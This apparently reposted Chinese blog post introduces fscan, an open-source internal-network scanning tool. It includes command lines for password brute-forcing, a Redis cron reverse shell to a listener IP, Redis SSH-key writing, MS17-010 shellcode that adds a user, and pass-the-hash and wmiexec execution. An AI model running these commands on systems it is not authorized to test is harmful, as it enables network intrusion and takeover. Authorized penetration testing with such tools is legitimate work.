今天给大家分享一个开源的内网扫描工具,在GitHub平台上面有5.3K Star。具体情况如下:
简介
fscan是一款 go语言编写的内网综合扫描工具,方便「一键自动化、全方位漏扫扫描」。可以让你快速的扫描出内网网络的拓扑结构支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能。
主要功能
1.信息搜集:
存活探测(icmp)
端口扫描2.爆破功能:
各类服务爆破(ssh、smb、rdp 等)
数据库密码爆破(mysql、mssql、redis、psql、oracle 等)3.系统信息、漏洞扫描:
netbios 探测、域控识别
获取目标网卡信息
高危漏洞扫描(ms17010 等)4.Web 探测功能:
webtitle 探测
web 指纹识别(常见 cms、oa 框架等)
web 漏洞扫描(weblogic、st2 等,支持 xray 的 poc)5.漏洞利用:
redis 写公钥或写计划任务
ssh 命令执行
ms17017 利用(植入 shellcode),如添加用户等6.其他功能:
文件保存
简单用法
fscan.exe-h192.168.1.1/24(全功能、ms17010、读取网卡信息)fscan.exe-h192.168.1.1/16(B段扫描)
其他用法
fscan.exe-h192.168.1.1/24-np-no-nopoc(跳过存活检测、不保存文件、跳过webpoc扫描)fscan.exe-h192.168.1.1/24-rfid_rsa.pub(redis写公钥)fscan.exe-h192.168.1.1/24-rs192.168.1.1:6666(redis计划任务反弹shell)fscan.exe-h192.168.1.1/24-c"whoami;id"(ssh爆破成功后,命令执行)fscan.exe-h192.168.1.1/24-mssh-p2222(指定模块ssh和端口)fscan.exe-h192.168.1.1/24-pwdfpwd.txt-userfusers.txt(加载指定文件的用户名、密码来进行爆破)fscan.exe-h192.168.1.1/24-o/tmp/1.txt(指定扫描结果保存路径,默认保存在当前路径)fscan.exe-h192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)fscan.exe-h192.168.1.1/24-msmb-pwdpassword(smb密码碰撞)fscan.exe-h192.168.1.1/24-mms17010(指定模块)fscan.exe-hfip.txt(以文件导入)fscan.exe-h192.168.x.x-p80-proxyhttp://127.0.0.1:8080一键支持xray的pocfscan.exe-uhttp://baidu.com-proxy8080(扫描单个url,并设置http代理http://127.0.0.1:8080)fscan.exe-h192.168.1.1/24-nobr-nopoc(不进行爆破,不扫Webpoc,以减少流量)fscan.exe-h192.168.1.1/24-pa3389(在原基础上,加入3389->rdp扫描)fscan.exe-h192.168.1.1/24-socks5127.0.0.1:1080(只支持简单tcp功能的代理,部分功能的库不支持设置代理)fscan.exe-h192.168.1.1/24-mms17010-scadd(内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)fscan.exe-h192.168.1.1/24-msmb2-useradmin-hashxxxxx(pthhash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)fscan.exe-h192.168.1.1/24-mwmiexec-useradmin-pwdpassword-cxxxxx(wmiexec无回显命令执行)fscan.exe-h192.168.x.x/24-mnetbios(-mnetbios时,才会显示完整的netbios信息)fscan.exe-h192.0.0.0/8-micmp(探测每个C段的网关和数个随机IP,并统计top10B、C段存活数量)
编译命令
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe (可选,压缩体积) #upx用于二进制文件大小瘦身用的
完整参数参考
-c string
ssh命令执行
-cookie string
设置cookie
-debug int
多久没响应,就打印当前进度(default60)
-domain string
smb爆破模块时,设置域名
-h string
目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
读取文件中的目标
-hn string
扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string
设置扫描模式: -m ssh (default"all")
-no
扫描结果不保存到文件中
-nobr
跳过sql、ftp、ssh等的密码爆破 ["安全"] -nopoc 跳过web poc扫描
-np
跳过存活探测
-num int
web poc 发包速率 (default20)
-o string
扫描结果保存到哪 (default"result.txt")
-p string
设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default"21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-path string
fcgi、smb romote file path
-ping
使用ping代替icmp进行存活探测
-pn string
扫描时要跳过的端口,as: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
设置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破时的用户名
-userf string
指定爆破时的用户名文件
-pwd string
指定爆破时的密码
-pwdf string
指定爆破时的密码文件
-rf string
指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
-rs string
redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
静默扫描,适合cs扫描时不回显
-sshkey string
ssh连接时,指定ssh私钥
-t int
扫描线程 (default600)
-time int
端口扫描超时时间 (default3)
-u string
指定Url扫描
-uf string
指定Url文件扫描
-wt int
web访问超时时间 (default5)
-pocpath string
指定poc路径
-usera string
在原有用户字典基础上,新增新用户
-pwda string
在原有密码字典基础上,增加新密码
-socks5
指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
-sc
指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add) ["安全"]
部分使用截图
fscan.exe-h 192.168.x.x (全功能、ms17010、读取网卡信息)
fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)
fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc文章来源:https://www.toymoban.com/news/detail-488029.html
fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)文章来源地址https://www.toymoban.com/news/detail-488029.html
到了这里,关于全自动化、全方位内网综合扫描、漏洞扫描开源工具 Fscan的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!